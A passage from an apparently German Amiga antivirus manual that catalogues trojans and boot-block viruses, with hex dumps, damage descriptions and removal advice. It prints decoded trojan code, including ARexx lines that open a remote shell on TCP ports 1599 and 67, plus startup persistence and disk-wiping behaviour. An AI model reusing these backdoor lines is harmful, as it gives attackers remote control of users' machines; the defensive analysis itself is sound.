  3457.          gemerkt zu haben, dass dieses Virusteil 3e8-3f1-Hunks ueberlaeuft.
  3458.          In diesen Files wird das Virusteil NIE gefunden. Dabei waere eine
  3459.          Testverseuchung des Files lawbreaker so einfach gewesen.
  3460.          Hinweis 07.12.94: Es ist ein weiteres Antivirusprogramm auf dem
  3461.          Markt, das zwar alle normale Files sauber behandelt, aber eben-
  3462.          falls mit 3E8-3F1-Hunks NICHT zurechtkommt.
  3463.  
  3464.          
  3465.    - Port-1599-Trojan   (Computer-Uebernahme) 
  3466.       Ein ARexx-Programm
  3467.       Die Codier-Routine entspricht aufs Byte der Routine von
  3468.       Port-67-Trojan.
  3469.       Mehrere Files sind notwendig 
  3470.       VT bietet loeschen an. Bitte kopieren Sie den Original-Loadwb-
  3471.       Befehl neu.
  3472.       WICHTIG !!! WICHTIG !!!!
  3473.       Das Installer-File und/oder Archiv ist UNBEKANNT. Bitte
  3474.       suchen Sie mit ???
  3475.       c:loadwb (falsch)       gepackt:  1192 Bytes
  3476.                               entpackt:  748 Bytes
  3477.       l:startup.handler  (loadwb echt)  1136 Bytes
  3478.       l:background.handler              1700 Bytes
  3479.       Meine Meinung: KEIN Programm OHNE Hintergedanken verschiebt
  3480.       ein Programm aus c: nach l: und nimmt dessen Name an.
  3481.       In loadwb (falsch) entpackt ist zu lesen:
  3482.           ffdc7000 4e5d4e75 52554e20 3e4e494c ..p.N]NuRUN >NIL
  3483.           3a204c3a 6261636b 67726f75 6e642e68 : L:background.h
  3484.           616e646c 6572004c 3a737461 72747570 andler.L:startup
  3485.           2e68616e 646c6572 00726578 786d6173 .handler.rexxmas
  3486.           74004e49 4c3a0000 74ff4e75 4e750000 t.NIL:..t.NuNu..
  3487.       In Wirklichkeit werden also mit DOS-Execute drei Programme
  3488.       gestartet.
  3489.       Im background-File ist uncodiert zu lesen:
  3490.           01014e75 24564552 3a204247 48616e64 ..Nu$VER: BGHand
  3491.           6c657220 322e3120 2831392e 392e3934 ler 2.1 (19.9.94
  3492.           29204368 696c6474 616b206d 616e6167 ) Childtak manag
  3493.           656d656e 7420686e 64720a00          ement hndr..
  3494.       background.handler enthaelt einen mehrfach-codierten Bereich.
  3495.       Im Speicher entsteht:
  3496.           00000043 54455354 313a3b61 64647265 ...CTEST1:;addre
  3497.           73732063 6f6d6d61 6e642027 57616974 ss command 'Wait
  3498.           20313020 6d696e27 3b3b6966 2073686f  10 min';;if sho
  3499.           77282770 272c274d 49414d49 2e312729 w('p','MIAMI.1')
  3500.           20746865 6e207369 676e616c 20534e4f  then signal SNO
  3501.           4f505445 53543b65 6c736520 7369676e OPTEST;else sign
  3502.           616c2054 45535432 3b544553 54323a3b al TEST2;TEST2:;
  3503.           3b696620 73686f77 28277027 2c27414d ;if show('p','AM
  3504.           49544350 27292074 68656e20 7369676e ITCP') then sign
  3505.           616c2053 4e4f4f50 54455354 3b656c73 al SNOOPTEST;els
  3506.           65207369 676e616c 20544553 54313b53 e signal TEST1;S
  3507.           4e4f4f50 54455354 3a3b6966 2073686f NOOPTEST:;if sho
  3508.           77282770 272c2753 4e4f4f50 444f5327 w('p','SNOOPDOS'
  3509.           29205448 454e2044 4f3b6164 64726573 ) THEN DO;addres
  3510.           7320736e 6f6f7064 6f732071 7569743b s snoopdos quit;
  3511.           454e443b 7369676e 616c2053 434f5554 END;signal SCOUT
  3512.           54455354 3b53434f 55545445 53543a3b TEST;SCOUTTEST:;
  3513.           69662073 686f7728 2770272c 2753434f if show('p','SCO
  3514.           55542e31 27292054 48454e20 444f3b61 UT.1') THEN DO;a
  3515.           64647265 73732073 636f7574 2e312051 ddress scout.1 Q
  3516.           5549543b 454e443b 7369676e 616c2050 UIT;END;signal P
  3517.           4f52543b 504f5254 3a3b6164 64726573 ORT;PORT:;addres
  3518.           7320636f 6d6d616e 64202752 756e203c s command 'Run <
  3519.           3e4e494c 3a204e65 77736865 6c6c2054 >NIL: Newshell T
  3520.           43503a31 35393927 3b736967 6e616c20 CP:1599';signal
  3521.           54455354 313b6578 69740000          TEST1;exit..
  3522.       Eine ARexx-Programmierung, eine Zeitschleife, Test auf Snoopdos
  3523.       und Scout, newshell.
  3524.       Nach Fremdaussage:
  3525.       Es sollen unberechtigte Zugriffe (Passwoerter ausspaehen,
  3526.       Format Partition) erfolgt sein.
  3527.       Nachtrag 98-03-05:
  3528.       Es haben mich mehrere E-Mails erreicht. Der 1599-Port scheint
  3529.       "Insidern" seit einiger Zeit bekannt zu sein. Die entsprechenden
  3530.       Amiga-Programme sollen inzwischen Abwehreintraege erlauben.
  3531.       siehe auch Port-67-Trojan
  3532.         
  3533.          
  3534.    - Port-67-Trojan   (Computer-Uebernahme)
  3535.       Ein ARexx-Programm
  3536.       Die Codier-Routine entspricht aufs Byte der Routine von
  3537.       Port-1599-Trojan.
  3538.       VT bietet loeschen an. 
  3539.       Filename: mkey.exe  L: 1880 Bytes
  3540.       Nach File-ID:
  3541.         .--------------------------------------.
  3542.         |So rumour has it Holger has released a|
  3543.         |virus to harm users with fake miami   |
  3544.         |keyfiles. This will check your keys to|
  3545.         |ensure its safe to use, dEN saves ya  |
  3546.         |and fists Holgers ass!                |
  3547.         `--------------------------------------'
  3548.             }-- dEN 3/3/98   pHuKeRs --{
  3549.       Im File ist uncodiert zu lesen:   
  3550.           01014e75 24564552 3a202d4d 69616d69 ..Nu$VER: -Miami
  3551.           204b6579 2046696c 65205661 6c696461  Key File Valida
  3552.           746f7220 76312e30 2d20a964 454e5e70 tor v1.0- .dEN^p
  3553.           484b2069 6e203139 39380a00          HK in 1998..
  3554.       mkey.exe enthaelt einen mehrfach-codierten Bereich.
  3555.       Im Speicher entsteht:   
  3556.           00000070 2f2a202a 2f0a2020 20205361 ...p/* */.    Sa
  3557.           79202727 0a202020 20536179 20274d69 y ''.    Say 'Mi
  3558.           616d6920 4b657966 696c6520 56616c69 ami Keyfile Vali
  3559.           6461746f 7220a96f 44654420 62792064 dator .oDeD by d
  3560.           454e5e50 486b2031 39393827 0a202020 EN^PHk 1998'.
  3561.           20536179 2027270a 20202020 53617920  Say ''.    Say
  3562.           27527566 662c2062 75742066 69727374 'Ruff, but first
  3563.           20746f20 63686563 6b21270a 0a6f7065  to check!'..ope
  3564.           6e282773 63726970 74272c27 456e7641 n('script','EnvA
  3565.           72633a4d 69616d69 6368616e 67654442 rc:MiamichangeDB
  3566.           272c2757 27290a77 72697465 6c6e2827 ','W').writeln('
  3567.           73637269 7074272c 27414444 20696e65 script','ADD ine
  3568.           74642064 61792073 74726561 6d207463 td day stream tc
  3569.           7020646f 73206269 6e205072 74206e65 p dos bin Prt ne
  3570.           77636c69 20746370 3a363727 290a636c wcli tcp:67').cl
  3571.           6f736528 27736372 69707427 290a0a49 ose('script')..I
  3572.           46204f50 454e2827 74686572 65272c27 F OPEN('there','
  3573.           6d69616d 693a4d69 616d692e 6b657931 miami:Miami.key1
  3574.           272c2752 27290a54 48454e20 63686563 ','R').THEN chec
  3575.           6b322829 0a454c53 45205361 79202727 k2().ELSE Say ''
  3576.           0a202020 20536179 20274b65 79203120 .    Say 'Key 1
  3577.           69732062 6164206f 72206e6f 6e206578 is bad or non ex
  3578.           69737461 6e74270a 20202020 53617920 istant'.    Say
  3579.           27446964 20796f75 206d616b 65206120 'Did you make a
  3580.           4d69616d 693a2061 73736967 6e20746f Miami: assign to
  3581.           20796f75 72206b65 79733f27 0a202020  your keys?'.
  3582.           20536179 2027270a 45786974 0a0a6368  Say ''.Exit..ch
  3583.           65636b32 3a0a4946 204f5045 4e282774 eck2:.IF OPEN('t
  3584.           68657265 32272c27 6d69616d 693a4d69 here2','miami:Mi
  3585.           616d692e 6b657932 272c2752 27290a54 ami.key2','R').T
  3586.           48454e20 646f6e65 28290a45 4c534520 HEN done().ELSE
  3587.           53617920 27270a20 20202053 61792027 Say ''.    Say '
  3588.           4b657920 32206973 20626164 206f7220 Key 2 is bad or
  3589.           6e6f6e20 65786973 74616e74 270a2020 non existant'.
  3590.           20205361 79202742 65747465 7220676f   Say 'Better go
  3591.           20616e64 20676574 20736f6d 65746869  and get somethi
  3592.           6e672062 65747465 7221270a 20202020 ng better!'.
  3593.           53617920 27270a45 7869740a 0a646f6e Say ''.Exit..don
  3594.           653a0a53 61792027 270a5361 7920272b e:.Say ''.Say '+
  3595.           2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ----------------
  3596.           2d2d2d2d 2d2b270a 53617920 277c3d2d -----+'.Say '|=-
  3597.           3d2d4b65 79732061 72652066 696e652d =-Keys are fine-
  3598.           3d2d3d7c 270a5361 7920272b 2d2d2d2d =-=|'.Say '+----
  3599.           2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ----------------
  3600.           2d2b270a 65786974 0a0a7265 7475726e -+'.exit..return
  3601.           20310000                             1..
  3602.       Fremdaussage (Danke):
  3603.       Die kritische Zeile ist:
  3604.       writeln('script','ADD inetd day stream tcp dos bin Prt newcli tcp:67')
  3605.       Das führt dazu, daß die Einstellungen von Miami geändert werden und
  3606.       jedesmal beim Start ein neues CLI geöffnet wird. Dieses wird nicht mit
  3607.       CON: verknüpft sondern mit TCP: Port 67
  3608.       Die Texte zu key1 und 2 sind nur eine Ablenkausgabe, OHNE Aussage-
  3609.       kraft.
  3610.       siehe auch Port-1599-Trojan
  3611.  
  3612.  
  3613.    - POWERBOMB  ByteBandit/Forpib-Clone    s.o.
  3614.          Text: POWERBOMB SYSTEMS PRESENTS: BYTE BANDIT V2.0 !!!
  3615.  
  3616.    - PowerTeam  BB    KickTag, KickCheckSum, BeginIo
  3617.                nicht mit KS2.04
  3618.                Teile des BB's codiert mit eor.w d1,(a0)+
  3619.                Schaeden:
  3620.                - Sobald die Zaehlzelle den Wert $a erreicht hat,
  3621.                  Textausgabe mit DisplayAlert und dann bei mir
  3622.                  Absturz. Text:
  3623.                   Virus Meditation #0026051990.PowerTeam
  3624.  
  3625.    - pOWERtRADER-Troj.    Zerstoerung
  3626.          Name: vom Filenamen uebernommen angeblich V2.5
  3627.          Laenge gepackt:    5324 Bytes
  3628.          Laenge ungepackt: 48388 Bytes
  3629.          Keine verbogenen Vektoren
  3630.          Keine Vermehrung
  3631.          Im File ist zu lesen:
  3632.             ffe84e75 73637369 2e646576 69636500 ..Nuscsi.device.
  3633.                 ;....
  3634.             48414841 48414841 48414841 48414841 HAHAHAHAHAHAHAHA
  3635.             48414841 48414841 48414841 48414841 HAHAHAHAHAHAHAHA
  3636.          Schaden:
  3637.          Es wird scsi.device Unit 0 geoeffnet und mit SendIo Muell
  3638.          (HAHA s.o.) in einer Schleife ab Block 0 (RIGID) geschrieben.
  3639.          VT bietet loeschen an.
  3640.  
  3641.  
  3642.    - PP-Bomb   Powerpacker, File-Trojan, keine Vermehrung, Vers.Nr. 3.2
  3643.       - 3 Programmteile
  3644.          - kurzer CodeHunk mit 2 jsr-Befehlen (notwendig fuer Ablauf)
  3645.          - crunched Bomb-Teil
  3646.          - Powerpacker 3.0b (ich glaube: NICHT veraendert und nicht ge-
  3647.                              crunched)
  3648.       Bomb-Teil:
  3649.       wird zuerst angesprungen, decrunched Laenge: 9880 Bytes
  3650.       Aztec-Prg mit dt. Fehlermeldungen (z.B. Fehler bei DISKFONTBASE)
  3651.       - sucht zuerst SnoopDos-Task; falls ja Bomb-Ende
  3652.       - sucht in c von dh0: und/oder dh1: nach why und setzt das File
  3653.         auf 0 Bytes
  3654.       - enthaelt alle Dos-Befehle um Files zu veraendern (sucht auch
  3655.         auf dh0: und dh1:, ist getestet).
  3656.       - soll AmiExpress veraendern (hab ich nicht)
  3657.       - weitere Eintraege: BBS: DH0:BBS/ DH1:BBS/ DH0: DH1:
  3658.       Ursprung:
  3659.                   qtx_pow.lzh       139670 Bytes
  3660.       Empfehlung:  (s.u.)
  3661.         loeschen und Original-Powerpacker aufkopieren
  3662.       Nachtrag 29.12.92: Es wurde mir ein weiteres verseuchtes File
  3663.         zugeschickt.  Name: snap   Laenge: 44260 Bytes
  3664.         Daraufhin wurden die Linkversuche mit PP wiederholt und mit
  3665.         snap neu durchgefuehrt. An beide Files kann sich der PP-Bomb-
  3666.         Teil  NICHT  von selbst linken. Es hat also jemand nachgehol-
  3667.         fen.
  3668.       Nachtrag 30.12.92: Es wurde in VT eine PP-Bomb-Ausbauroutine
  3669.         eingebaut. Diese Routine koennte wackeln. Fertigen Sie BITTE
  3670.         deshalb VOR dem Ausbauversuch ein Kopie an. Testen Sie nach
  3671.         dem Ausbau bitte die Lauffaehigkeit des verkuerzten Programms.
  3672.         Danke
  3673.       Nachtrag 16.02.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht.
  3674.         Haengt an Died. Died verseucht Laenge: 67028 Bytes
  3675.         Ausgabe: PP-Bomb 2
  3676.         Besonderheit: Das PP-Bomb-Trojan-Teil wurde in der Laenge ge-
  3677.         kuerzt !!! Da im gepackten Teil eine Hunk-Kennung von $3EA auf
  3678.         $3E9 geaendert wurde, besteht Absturzgefahr ???? (2.Start von
  3679.         verseuchtem Died auf A4000 = GURU)
  3680.         Erkennung und Ausbau mit VT getestet: 16/17.02.93
  3681.       Nachtrag 17.02.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht.
  3682.         Haengt an MegaMon. MegaMon verseucht Laenge: 26856 Bytes
  3683.         Ausgabe: PP-Bomb 3
  3684.         Besonderheit: Das PP-Bomb-Trojan-Teil wurde in der Laenge ge-
  3685.         kuerzt !!!
  3686.         Erkennung und Ausbau mit VT getestet: 17.02.93
  3687.       Nachtrag 10.12.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht.
  3688.         Haengt an Died V2.8 .
  3689.         Died V2.8 verseucht UND gepackt Laenge: 31320 Bytes
  3690.         Besonderheit: Es handelt sich um das verseuchte Died-Prg. (s.o.).
  3691.         Die ASCII-Version wurde erhoeht, der PP-Bomb-Teil mit $4eb9 ange-
  3692.         linkt und dann das ganze File noch gepackt.
  3693.         VT bietet loeschen an.
  3694.         Wenn Sie das Died-Prg. V2.8 umbedingt haben wollen (es ist wirk-
  3695.         lich nur ein ASCII-Fake), so entpacken Sie bitte das Prg. Danach
  3696.         bietet VT Ausbau an.
  3697.         Died V2.8 Virusteil ausgebaut Laenge: 61692 Bytes
  3698.         Erkennung und Ausbau mit VT getestet: 10.12.93
  3699.       Nachtrag 25.12.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht.
  3700.         Haengt an ModuleMaster V1.7 .
  3701.         ModuleMaster verseucht Laenge :    20364 Bytes
  3702.         ModuleMaster Virusteil ausgebaut : 15108 Bytes
  3703.         Ausgabe: PP-Bomb 4
  3704.         Erkennung und Ausbau mit VT getestet: 25.12.93
  3705.       PP-Bomb-Virusteil entpackt Auszug:
  3706.                                       42425300             BBS.
  3707.            44483000 44483100 44483000 44483100 DH0.DH1.DH0.DH1.
  3708.            4242533a 00444830 3a424253 2f004448 BBS:.DH0:BBS/.DH
  3709.            313a4242 532f0044 48303a00 4448313a 1:BBS/.DH0:.DH1:
  3710.             ......
  3711.                     536e6f6f 70446f73 00433a57 `...SnoopDos.C:W
  3712.            68790077                            hy.w
  3713.  
  3714.    - PP veraendert
  3715.         VT glaubt einen PP-Hunk gefunden zu haben, bei dem die Hunk-
  3716.         laenge ($83, $9E) NICHT stimmt. Es kann auch eine FEHLMELDUNG
  3717.         sein !!!!
  3718.         Schauen Sie sich bitte das File etwas genauer an, ob nicht
  3719.         ein unbekanntes Teil nach dem Entpackheader (aber vor dem Data-
  3720.         Hunk) eingebaut wurde.
  3721.  
  3722.    - PRIMAVERA-Virus   BB    EXTREME-Clone  siehe oben
  3723.         Nur Text geaendert. Im BB ist zu lesen:
  3724.            696f6e2e 6c696272 61727900 00b01554 ion.library....T
  3725.            68652052 65747572 6e206f66 20507269 he Return of Pri
  3726.            6d612056 65726120 56697275 73212121 ma Vera Virus!!!
  3727.  
  3728.    - PROMOTER Virus  Laenge: 1848 Bytes
  3729.         Name: Disk-Validator
  3730.         KS1.3: ja   KS2.04: nein  Disk-Validator im ROM
  3731.         Resetfest: nein
  3732.         Verbogene Vektoren: nein
  3733.         Block-Codier-Routine: nein
  3734.         Originalfunktion wird NICHT erfuellt.
  3735.         Meldet sich nach Vermehrung mit DisplayAlert und fordert zum
  3736.         Wechsel auf KS2.04 auf. Muesste also SOFORT auffallen.
  3737.         Im File ist zu lesen:
  3738.            79006466 303a6c2f 6469736b 2d76616c y.df0:l/disk-val
  3739.            69646174 6f720000 00281120 20202020 idator...(.
  3740.            20202020 20202049 20616d20 74686520        I am the
  3741.            4b69636b 73746172 7420322e 30202d20 Kickstart 2.0 -
  3742.            50524f4d 4f544552 202d2056 69727573 PROMOTER - Virus
  3743.  
  3744.    - Pstats-Virus  File  Laenge ungepackt: 19784 Bytes
  3745.         GFA-Basic-Programm. Keine verbogenen Vektoren
  3746.         Zielgerichtet gegen PHOBOS. Ein Mailbox-Programm (kenne ich nicht).
  3747.         Bleibt nicht im Speicher. Von der Definition ein reines Zer-
  3748.         stoerungsprogramm und kein Virus, da keine Vermehrung. Also KEINE
  3749.         Gefahr fuer "normale" Amiga-User. Es wird nach einigen Filenamen
  3750.         gesucht und dann deren Inhalt mit Speichermuell ueberschrieben.
  3751.               S:PHOBOS.CONF
  3752.               NETZCONFIG
  3753.               BRETTERCONFIG
  3754.               USERCONFIG
  3755.         Einige der oben genannten Filenamen werden auch noch mit der Er-
  3756.         weiterung .TAPO, .BAK, .CONF1 usw. gesucht. Nach der Zerstoerungs-
  3757.         arbeit wird also das Mailboxsystem nicht mehr laufen.
  3758.         Empfehlung: loeschen
  3759.         Es gibt da nichts auszubauen, da das Virusteil IM GFA-Teil sitzt.
  3760.         Der Programmierer MUSS also den sourcecode von pstats besitzen.
  3761.         Zumindestens ist mir kein Recompiler fuer GFA-Basic bekannt.
  3762.  
  3763.  
  3764.    - Pseudoselfwriter   andere Namen: Selfwriter, siehe bei Lamer
  3765.  
  3766.    - Purge-Inst.    File
  3767.         Laenge gepackt:   9812 Bytes
  3768.         Laenge ungepackt: 14864 Bytes
  3769.         KEINE verbogenen Vektoren
  3770.         Original-Name des Files unbekannt.
  3771.         Duerfte in E geschrieben sein.
  3772.         Da keiner freiwillig so ein File startet, vermute ich dass das
  3773.         File in die startup-sequence einer Spiele-Disk oder so aehnlich
  3774.         eigebaut ist.
  3775.         Ablauf:
  3776.         Nach folgenden LWen wird gesucht:
  3777.         DH0, DH1, DH2, DH3, HD0, HD1, HD2, HD3, DF0, DF1, DF2, DF3, A
  3778.         und B.
  3779.         In das C-Verzeichnis und in das WBStartup-Verzeichnis (Falls vor-
  3780.         handen wird ein GEPACKTES File mit dem Namen Purge geschrieben.
  3781.         In die startup-sequence und in die User-Startup (falls vorhanden)
  3782.         wird die Zeile  Run >NIL: Purge  eingefuegt.
  3783.         Beim naechsten Reset wird also IMMER das Purge-Trojan-Teil aufge-
  3784.         rufen.
  3785.  
  3786.    - Purge-Trojan  File
  3787.         Laenge gepackt:   5300 Bytes
  3788.         Laenge ungepackt: 14776 Bytes
  3789.         Das File liegt in C und/oder in WBStartup (s.0.)
  3790.         Ablauf:
  3791.         Nach Aufruf wird das Purge-Trojan-File ueberschrieben mit einem
  3792.         UNGEPACKTEN Purge-File, das nur noch 5212 Bytes lang ist. (Text-
  3793.         ausgabe).
  3794.         Danach begibt sich der Prozess in ein Delay :
  3795.               move.l #$7BC,D0
  3796.               muls.w #$32,D0    (bei mir rund 33 Minuten)
  3797.         Sobald die Zeit abgelaufen ist, wird mit Dos-Befehlen (examine usw.)
  3798.         nach Icons gesucht.
  3799.         Diese Icons werden durch ein neues Icon (Laenge: 2164 Bytes) ersetzt.
  3800.         Dieser Vorgang MUESSTE normal auffallen. Probieren Sie einen
  3801.         Tastatur-Reset. Die Festplatte wird beim naechsten Aufruf wieder
  3802.         validiert. Ja man soll das nicht machen, aber es ist die einzige
  3803.         Moeglichkeit eines Abbruchs.
  3804.         Wenn Sie das Programm weiterarbeiten lassen, so erscheint danach
  3805.         fuer etwa eine Minute ein gadgetloses Fenster mit Text:
  3806.  
  3807.           Friend of Terminator is there !!!
  3808.           ANTIPIRAT
  3809.           Power of Destroying !!!
  3810.           My ultimate answer against all the fucking softwarepirats !
  3811.           Hi Anatol,Cycledom,Primitive,Bj.rn,Dead Homer,Brian,
  3812.           Gigant,Termination 8,Hardball & Slimeck.
  3813.           Worked on all available devices...!
  3814.           Ready....
  3815.  
  3816.         Schaeden:
  3817.         Wenn Sie nun das entsprechende Laufwerk oeffnen, werden Sie nur
  3818.         noch ein Icon sehen, da alle uebereinander liegen. Im Icon koen-
  3819.         nen Sie lesen:    FUCKING
  3820.                           SOFTWARE
  3821.                              PIRAT
  3822.         Da das Icon vom Typ Project ist, koennen keine Programme mehr
  3823.         ueber Icon gestartet werden.
  3824.         VT2.68 sollte den Prozess finden und versucht ihn abzuschalten
  3825.         (GURU-Gefahr !!).
  3826.         VT2.68 sollte die drei Purge-File-Typen erkennen und bietet
  3827.         loeschen an.
  3828.         Das entstehende Purge-Icon sollte auch erkannt werden, aber der
  3829.         Versuch 100 Icons mit VT zu loeschen, ist zu langsam. Nehmen Sie
  3830.         hierfuer ein Directory-Tool.
  3831.         Die Programme auf meiner Test-Partition waren noch brauchbar,
  3832.         halt ohne Icon.
  3833.  
  3834.    - PVL.BB   (L)
  3835.         Nach meiner Meinung NIE lauffaehig. Warum er dann doch hier
  3836.         steht. Weil dieser BB als Virus weitergegeben wird und damit
  3837.         die Erbsenzaehler eine Ruhe geben. Ich habe auf jeder Maschine
  3838.         nur den GURU gesehen und wenn man versucht den BB zu re-
  3839.         assemblieren, sieht man auch warum.
  3840.         Versucht durch Text zu taeuschen:
  3841.            00261054 68697320 4469736b 20497320 .&.This Disk Is
  3842.            6e6f7420 496e6665 63746564 20427920 not Infected By
  3843.            416e7920 4b696e64 204f6620 56697275 Any Kind Of Viru
  3844.            73204974 73204f6b 61792021 00010012 s Its Okay !....
  3845.            204c6566 74204d6f 75736542 7574746f  Left MouseButto
  3846.            6e3a2043 6f6e7469 6e756520 776f726b n: Continue work
  3847.            202c2052 69676874 204d6f75 73654275  , Right MouseBu
  3848.            74746f6e 3a204272 65616b20 20200000 tton: Break   ..
  3849.            00341054 68697320 6469736b 20697320 .4.This disk is
  3850.            6f6b6179 20636f6e 74696e75 65207769 okay continue wi
  3851.            74682079 6f757220 776f726b 696e6720 th your working
  3852.            20200001 0012204c 65667420 4d6f7573   .... Left Mous
  3853.            65427574 746f6e3a 20436f6e 74696e75 eButton: Continu
  3854.            6520776f 726b202c 20526967 6874204d e work , Right M
  3855.            6f757365 42757474 6f6e3a20 42726561 ouseButton: Brea
  3856.            6b202020 0000ffff ffffffff ffffffff k   ............
  3857.  
  3858.  
  3859.    - QRDL V1.1  Link verlaengert ein File um 2320 Bytes
  3860.      Vermehrung nur gelungen mit KS1.3 und Chip 512 kein Fastmem
  3861.      KS37.300 (A600) : immer GURU 3
  3862.  
  3863.          Haengt sich als 1.Hunk (neuer) ein.
  3864.          Zuerst gefunden an: PPLoadSeg  Laenge verseucht: 3484 Bytes
  3865.          Namensbegruendung: nach eor.b d5,(a0)+ ist im Speicher zu
  3866.          lesen:
  3867.            00000000 28432931 3939322D 30342D31 ....(C)1992-04-1
  3868.            36205152 444C2E20 52656C65 61736520 6 QRDL. Release
  3869.            312E3120 426F726E 20696E20 506F6C61 1.1 Born in Pola
  3870.            6E642C20 47727420 746F204A 61636B20 nd, Grt to Jack
  3871.          Verbogene Vektoren je nach Aktivierungsstand:
  3872.            Cool, DoIo, NewOpenLib, OpenWindow, $78(a6)->,
  3873.          Schaden A:
  3874.            Sucht den BitMapBlock einer Disk und gibt alle Bloecke
  3875.            frei. Fehler konnte erzeugt werden.
  3876.          Schaden B:
  3877.            Linkt sich an das erste File der startup-sequence.
  3878.            Mit KS1.3 (s.o.) gelungen
  3879.  
  3880.            Speichererkennung getestet:        20.11.92
  3881.            Fileerkennung und Ausbau getestet: 20.11.92
  3882.        Hinweis: Sie muessen auf Aufforderung PPLOADSeg loeschen,
  3883.            sonst besteht die Gefahr, dass VT den QRDL im Speicher
  3884.            uebersieht. Ich wiederhole mich ungern, aber noch einmal:
  3885.            Fuer einen sinnvollen Filetest mit VT  MUSS!!!! der Speicher
  3886.            sauber sein. Dies gilt nicht nur fuer QRDL, sondern allge-
  3887.            mein.
  3888.  
  3889.    - RAF-Virus  BB  WARHAWK-Clone  s.u.
  3890.            Nur Text geaendert. Eine Meisterleistung
  3891.            Im BB ist zu lesen:
  3892.            4b54494f 4e2e2020 20204120 56495255 KTION.    A VIRU
  3893.            53204120 44415920 4b454550 53205448 S A DAY KEEPS TH
  3894.            4520424f 4f54424c 4f434b53 20415741 E BOOTBLOCKS AWA
  3895.            59212121 21212120 20205241 46002c28 Y!!!!!!   RAF.,(
  3896.          Hinweis: Das Programm sichert den Bereich ab $7E600 NICHT.
  3897.          D.h. ein anderes Prg. z.B. VT kann genau an diese Stelle
  3898.          geladen werden. Da der verbogene Coolzeiger in der Exec
  3899.          liegt und dieser Bereich ja geschuetzt ist, kann es zur Aus-
  3900.          gabe "unbekanntes Prg" kommen. Mit 5 MB wurde dieses Virusteil
  3901.          im Speicher richtig erkannt, aber natuerlich bleibt unter KS1.3
  3902.          bei dieser Speichergroesse, nach einem RESET das Prg. nicht er-
  3903.          halten und eine Vermehrung ist ueber DoIo nicht moeglich.
  3904.  
  3905.  
  3906.    - Random Access      CopperIntro
  3907.          schreibt GURU nach $60, nicht resident, keine Vermehrung
  3908.          Empfehlung: sofort loeschen
  3909.          von der Definition KEIN Virus, aber schaedlich wg. $60
  3910.  
  3911.  
  3912.    - Rastenbork-Inst.   File
  3913.          Laenge gepackt:   5220 Bytes
  3914.          Laenge ungepackt: 8640 Bytes
  3915.          KEINE verbogenen Vektoren
  3916.          Sofort Loeschen
  3917.          Erlaubt das Anlegen von zwei BB-Viren (s.u.)
  3918.          Im File ist zu lesen:
  3919.              54684520 72415354 656e624f 726b2069 ThE rASTenbOrk i
  3920.              4e735441 6c6c6572 20627920 50655065 NsTAller by PePe
  3921.              2f745253 69005669 72757349 6e666f00 /tRSi.VirusInfo.
  3922.  
  3923.     - Rastenbork-Virus  BB
  3924.          Typ A:          (Rastenborg)
  3925.          Version: 1.2
  3926.          Verbogene Vektoren: Cool, DoIo
  3927.          Resetfest.
  3928.          Fordert trackdisk.device NICHT .
  3929.          Im BB ist zur Taeuschung uncodiert zu lesen:
  3930.              69627261 72790042 6f6f7420 56697275 ibrary.Boot Viru
  3931.              73205072 6f746563 746f7220 76352e34 s Protector v5.4
  3932.              00566563 746f7273 2077726f 6e672100 .Vectors wrong!.
  3933.              426f6f74 20636f6e 7461696e 73205343 Boot contains SC
  3934.              4120286f 72207369 6d696c61 72292076 A (or similar) v
  3935.              69727573 20210043 6f6c6400 436f6f6c irus !.Cold.Cool
  3936.              00446f49 4f206368 616e6765 64210041 .DoIO changed!.A
  3937.              204e5053 2070726f 64756374 696f6e2e  NPS production.
  3938.          Schaeden:
  3939.          a) Vermehrt sich ueber BB.
  3940.          b) Sobald eine Zaehlzelle den Wert $B erreicht hat, wird
  3941.             ein Block mit Muell gefuellt. Der Block ist NICHT zu
  3942.             retten. Versuchen Sie mit DiskSalv2 etwas zu retten.
  3943.             Danach wird ein BB-Teil mit mit EOR.L D1,D0 decodiert
  3944.             und mit DisplayAlert ausgegeben:
  3945.           ­­ Meet your new friend,The Rastenborg Virus v1.2 ­­
  3946.              Congratulations! Disk in drive is unprotected.
  3947.           It probably has no more root block,but who cares...
  3948.         ALL thanksgiving services please send to PePe/?"???????
  3949.                                            Poland,Ketrzyn,1994.04.08
  3950.                                                    .
  3951.          Hinweis: Der Programmierer schreibt hier Rastenborg, also "g".
  3952.  
  3953.          Typ B:      (rAStENboRk)
  3954.          Version: 2.0
  3955.          Verbogene Vektoren: Cool, DoIo
  3956.          Resetfest.
  3957.          Fordert trackdisk.device NICHT .
  3958.          Im BB ist zur Taeuschung uncodiert zu lesen:
  3959.              50616e7a 65722074 6f74616c 20616e74 Panzer total ant
  3960.              69207669 72757320 73797374 656d0056 i virus system.V
  3961.              69727573 20646573 74726f79 65642100 irus destroyed!.
  3962.          Schaeden:
  3963.          a) Vermehrt sich ueber BB.
  3964.          b) Sobald eine Zaehlzelle den Wert $B erreicht hat, soll
  3965.             mit add.b #7 ein Bereich ab $6E000 auf einer Laenge
  3966.             von $6400 veraendert werden. $6E000 ist nur bei einer
  3967.             DD-Disk der Root-Zylinder.
  3968.             Vorher  Block:    880
  3969.           0000: 00000002 00000000 00000000 00000048 ...............H
  3970.           0010: 00000000 1d397726 00000000 00000000 .....9w&........
  3971.             usw.
  3972.             Nachher Block:    880
  3973.           0000: 07070709 07070707 07070707 0707074f ...............O
  3974.           0010: 07070707 24407e2d 07070707 07070707 ....$@~-........
  3975.             usw.
  3976.           Dieser Bereich koennte also "rueck-codiert" werden.
  3977.             Danach wird ein BB-Teil mit mit EOR.L D1,D0 decodiert
  3978.             und mit DisplayAlert ausgegeben: 
  3979.               rAStENboRk cAShEr vIRUs v2.0
  3980.                ...another Christmas`94 present!
  3981.               Your disk isn't damaged,but it has just been coded.
  3982.               Try to find coding routine.
  3983.               If got any problems,contact Santa Claus
  3984.               or just PePe/tRSi
  3985.               Bonus disks are welcome!
  3986.           Der Programmierer schreibt hier Rastenbork, also "k".
  3987.           Hinweis 2: Falls in VT-RootBlock "von rAStENboRk cod." ange-
  3988.           zeigt wird brechen Sie bitte ab. Gehen Sie in VT-Prefs und
  3989.           schalten Sie den Sicherheitsrequester ab. Testen Sie dann
  3990.           die Disk mit BlockItest. Von Block 880-929 wird Ihnen dann
